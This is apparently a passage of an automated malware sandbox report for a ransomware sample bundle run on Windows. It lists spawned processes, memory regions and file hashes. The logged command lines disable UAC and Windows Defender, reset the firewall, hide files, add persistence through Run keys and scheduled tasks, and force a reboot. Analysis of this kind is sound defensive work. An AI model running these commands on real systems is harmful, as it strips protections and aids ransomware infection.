PID 564 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\WINDOWS\302746537.exe

"C:\WINDOWS\302746537.exe"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM explorer.exe

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Delete /F /TN rhaegal

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\qiUYEYUk\vQkIcwYI.exe

"C:\Users\Admin\qiUYEYUk\vQkIcwYI.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 386111685 && exit"

C:\ProgramData\IIwkMYAg\wqccYwoU.exe

"C:\ProgramData\IIwkMYAg\wqccYwoU.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:56:00

C:\Windows\9DB7.tmp

"C:\Windows\9DB7.tmp" \\.\pipe\{5D983210-E07A-4516-81E0-21DD0A2D9431}

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QWQgYkUo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 152

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\Fantom.exe

"C:\Users\Admin\AppData\Local\Temp\Fantom.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Users\Admin\AppData\Local\Temp\ose00000.exe

"C:\Users\Admin\AppData\Local\Temp\ose00000.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\AC18.tmp\302746537.bat" "

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid 1692 & ping -n 3 127.1 & del /f /q "C:\Users\Admin\AppData\Local\Temp\[email protected]" & start C:\Users\Admin\AppData\Local\xeozppms.exe -f

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\is-DD3U8.tmp\is-2Q9DL.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DD3U8.tmp\is-2Q9DL.tmp" /SL4 $20190 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 386111685 && exit"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:56:00

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /F /TN rhaegal

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\saMkQEcw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\cmd.exe

cmd /c 154151664462343.bat

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock

C:\Users\Admin\AppData\Local\Temp\winsp2up.exe

"C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\fwUcoUQE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Users\Admin\AppData\Local\Temp\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\comctl32.ocx

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RYwAQMsk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\@[email protected]

"C:\Users\Admin\AppData\Local\Temp\@[email protected]"

C:\Program Files (x86)\VAV\vav.exe

"C:\Program Files (x86)\VAV\vav.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /pid 1692

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe

"C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\@[email protected]

@[email protected] co

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\sc.exe

sc stop WinDefend

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\sc.exe

sc config WinDefend start= disabled

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Roaming\lflesb.exe

C:\Users\Admin\AppData\Roaming\lflesb.exe

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

C:\Users\Admin\AppData\Local\Temp\taskdl.exe

"C:\Users\Admin\AppData\Local\Temp\taskdl.exe"

C:\Users\Admin\AppData\Local\Temp\ose00000.exe

"C:\Users\Admin\AppData\Local\Temp\ose00000.exe"

C:\Users\Admin\AppData\Local\Temp\Fantom.exe

"C:\Users\Admin\AppData\Local\Temp\Fantom.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3740 -s 152

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\taskse.exe

"C:\Users\Admin\AppData\Local\Temp\taskse.exe"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\winsp2up.exe

"C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EN2B55~1.EXE" >> NUL

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\muYwoMUs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "aztxuihvriyhjfk319" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f

C:\Users\Admin\AppData\Local\Temp\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]

C:\Users\Admin\AppData\Local\Temp\@[email protected]

@[email protected] vs

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\mscomctl.ocx

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\icYMcwcs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\[email protected] SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom

C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"

C:\Users\Admin\AppData\Local\Temp\is-BQ48U.tmp\is-GS133.tmp

"C:\Users\Admin\AppData\Local\Temp\is-BQ48U.tmp\is-GS133.tmp" /SL4 $300D0 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

Network


Files

memory/564-54-0x0000000000ED0000-0x0000000000EFC000-memory.dmp

memory/564-55-0x00000000004B0000-0x00000000004C6000-memory.dmp

memory/564-56-0x0000000000530000-0x0000000000536000-memory.dmp

memory/564-57-0x00000000005A0000-0x00000000005D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 c7e9746b1b039b8bd1106bca3038c38f
SHA1 cb93ac887876bafe39c5f9aa64970d5e747fb191
SHA256 b1369bd254d96f7966047ad4be06103830136629590182d49e5cb8680529ebd4
SHA512 cf5d688f1aec8ec65c1cb91d367da9a96911640c695d5c2d023836ef11e374ff158c152b4b6207e8fcdb5ccf0eed79741e080f1cbc915fe0af3dacd624525724

memory/1344-58-0x0000000000000000-mapping.dmp

memory/1116-61-0x0000000000000000-mapping.dmp

memory/1344-60-0x0000000074AD1000-0x0000000074AD3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 382430dd7eae8945921b7feab37ed36b
SHA1 c95ddaebe2ae8fbcb361f3bf080d95a7bb5bf128
SHA256 70e5e902d0ac7534838b743c899f484fe10766aefacc6df697219387a8e3d06b
SHA512 26abc02bde77f0b94613edc32e0843ac71a0a8f3d8ba01cb94a42c047d0be7befef52a81984e9a0fa867400082a8905e7a63aaaf85fa32a03d27f7bc6a548c3b

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 7dfbfba1e4e64a946cb096bfc937fbad
SHA1 9180d2ce387314cd4a794d148ea6b14084c61e1b
SHA256 312f082ea8f64609d30ff62b11f564107bf7a4ec9e95944dfd3da57c6cdb4e94
SHA512 f47b05b9c294688811dd72d17f815cce6c90f96d78f6835804d5182e2f4bfbd2d6738de854b8a79dea6345f9372ba76a36920e51e6cb556ef4b38b620e887eb4

memory/964-63-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 382430dd7eae8945921b7feab37ed36b
SHA1 c95ddaebe2ae8fbcb361f3bf080d95a7bb5bf128
SHA256 70e5e902d0ac7534838b743c899f484fe10766aefacc6df697219387a8e3d06b
SHA512 26abc02bde77f0b94613edc32e0843ac71a0a8f3d8ba01cb94a42c047d0be7befef52a81984e9a0fa867400082a8905e7a63aaaf85fa32a03d27f7bc6a548c3b

memory/1824-68-0x0000000000000000-mapping.dmp

memory/1488-69-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 910dd666c83efd3496f21f9f211cdc1f
SHA1 77cd736ee1697beda0ac65da24455ec566ba7440
SHA256 06effc4c15d371b5c40a84995a7bae75324b690af9fbe2e8980f8c0e0901bf45
SHA512 467d3b4d45a41b90c8e29c8c3d46ddfbdee9875606cd1c1b7652c2c7e26d60fedac54b24b75def125d450d8e811c75974260ba48a79496d2bdaf17d674eddb47

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 fbbdc39af1139aebba4da004475e8839
SHA1 de5c8d858e6e41da715dca1c019df0bfb92d32c0
SHA256 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
SHA512 74eca8c01de215b33d5ceea1fda3f3bef96b513f58a750dba04b0de36f7ef4f7846a6431d52879ca0d8641bfd504d4721a9a96fa2e18c6888fd67fa77686af87

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 fe1bc60a95b2c2d77cd5d232296a7fa4
SHA1 c07dfdea8da2da5bad036e7c2f5d37582e1cf684
SHA256 b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d
SHA512 266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

memory/1352-76-0x0000000000000000-mapping.dmp

memory/1752-80-0x0000000000400000-0x0000000000438000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 41789c704a0eecfdd0048b4b4193e752
SHA1 fb1e8385691fa3293b7cbfb9b2656cf09f20e722
SHA256 b2dcfdf9e7b09f2aa5004668370e77982963ace820e7285b2e264a294441da23
SHA512 76391ac85fdc3be75441fcd6e19bed08b807d3946c7281c647f16a3be5388f7be307e6323fac8502430a4a6d800d52a88709592a49011ecc89de4f19102435ea

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 0a7b70efba0aa93d4bc0857b87ac2fcb
SHA1 01a6c963b2f5f36ff21a1043587dcf921ae5f5cd
SHA256 4f5bff64160044d9a769ab277ff85ba954e2a2e182c6da4d0672790cf1d48309
SHA512 2033f9637b8d023242c93f54c140dd561592a3380a15a9fdc8ebfa33385ff4fc569d66c846a01b4ac005f0521b3c219e87f4b1ed2a83557f9d95fa066ad25e14

memory/2000-74-0x0000000000000000-mapping.dmp

memory/1484-89-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 248aadd395ffa7ffb1670392a9398454
SHA1 c53c140bbdeb556fca33bc7f9b2e44e9061ea3e5
SHA256 51290129cccca38c6e3b4444d0dfb8d848c8f3fc2e5291fc0d219fd642530adc
SHA512 582b917864903252731c3d0dff536d7b1e44541ee866dc20e0341cbee5450f2f0ff4d82e1eee75f770e4dad9d8b9270ab5664ffedfe21d1ad2bd7fe6bc42cf0e

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 0a7b70efba0aa93d4bc0857b87ac2fcb
SHA1 01a6c963b2f5f36ff21a1043587dcf921ae5f5cd
SHA256 4f5bff64160044d9a769ab277ff85ba954e2a2e182c6da4d0672790cf1d48309
SHA512 2033f9637b8d023242c93f54c140dd561592a3380a15a9fdc8ebfa33385ff4fc569d66c846a01b4ac005f0521b3c219e87f4b1ed2a83557f9d95fa066ad25e14

memory/1068-90-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 cb02c0438f3f4ddabce36f8a26b0b961
SHA1 48c4fcb17e93b74030415996c0ec5c57b830ea53
SHA256 64677f7767d6e791341b2eac7b43df90d39d9bdf26d21358578d2d38037e2c32
SHA512 373f91981832cd9a1ff0b8744b43c7574b72971b5b6b19ea1f4665b6c878f7a1c7834ac08b92e0eca299eb4b590bf10f48a0485350a77a5f85fc3d2dd6913db3

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 b805db8f6a84475ef76b795b0d1ed6ae
SHA1 7711cb4873e58b7adcf2a2b047b090e78d10c75b
SHA256 f5d002bfe80b48386a6c99c41528931b7f5df736cd34094463c3f85dde0180bf
SHA512 62a2c329b43d186c4c602c5f63efc8d2657aa956f21184334263e4f6d0204d7c31f86bda6e85e65e3b99b891c1630d805b70997731c174f6081ecc367ccf9416

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 cb02c0438f3f4ddabce36f8a26b0b961
SHA1 48c4fcb17e93b74030415996c0ec5c57b830ea53
SHA256 64677f7767d6e791341b2eac7b43df90d39d9bdf26d21358578d2d38037e2c32
